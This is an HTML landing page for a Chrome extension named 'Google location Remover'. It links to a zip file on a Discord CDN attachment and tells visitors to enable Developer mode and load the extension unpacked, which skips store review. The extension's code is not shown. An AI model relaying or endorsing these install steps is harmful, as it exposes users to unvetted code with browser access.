<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Google location Remover</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            background-color: #f4f4f4;
            color: #333;
        }
    
        header {
            background: linear-gradient(45deg, #f06, #09f, #0c6, #fc0, #f06, #09f, #0c6, #fc0);
            background-size: 400% 400%;
            animation: rainbowBackground 8s linear infinite;
            color: #ffffff9c;
            text-align: center;
            padding: 20px 0;
        }
    
        .container {
            max-width: 800px;
            margin: 20px auto;
            padding: 0 20px;
        }
    
        h1 {
            text-align: center;
        }
    
        p {
            line-height: 1.6;
        }
    
        ol {
            margin-top: 10px;
            margin-bottom: 20px;
            padding-left: 20px;
        }
    
        @keyframes rainbowBackground {
            0% {
                background-position: 0 50%;
            }
            100% {
                background-position: 100% 50%;
            }
        }
    </style>
    
</head>

<body>
    <header>
        <h1>Google location Remover</h1>
    </header>

    <div class="container">
        <p>Welcome to the website for Google location Remover. Here, you can find information and download the extension.</p>

        <!-- Add instructions for manual installation -->
        <p>To install the extension:</p>
        <ol>
            <li>Download the extension file (Google location Remover.zip) from <a href="https://cdn.discordapp.com/attachments/1184305442319503363/1188325558044606524/Google_loco_remover.zip?ex=659a1d6b&is=6587a86b&hm=c5e7594a74eb8e92b00d1983038ea78f35d3d6a3173900e80a9c30357626d569&">here</a>.</li>
            <li>Extract the downloaded file to a folder on your computer.</li>
            <li>Open Chrome and go to <strong>chrome://extensions/</strong>.</li>
            <li>Enable Developer mode (toggle switch usually located in the top right).</li>
            <li>Click on "Load unpacked" and select the folder containing the extracted extension files.</li>
        </ol>
    </div>
</body>

</html>
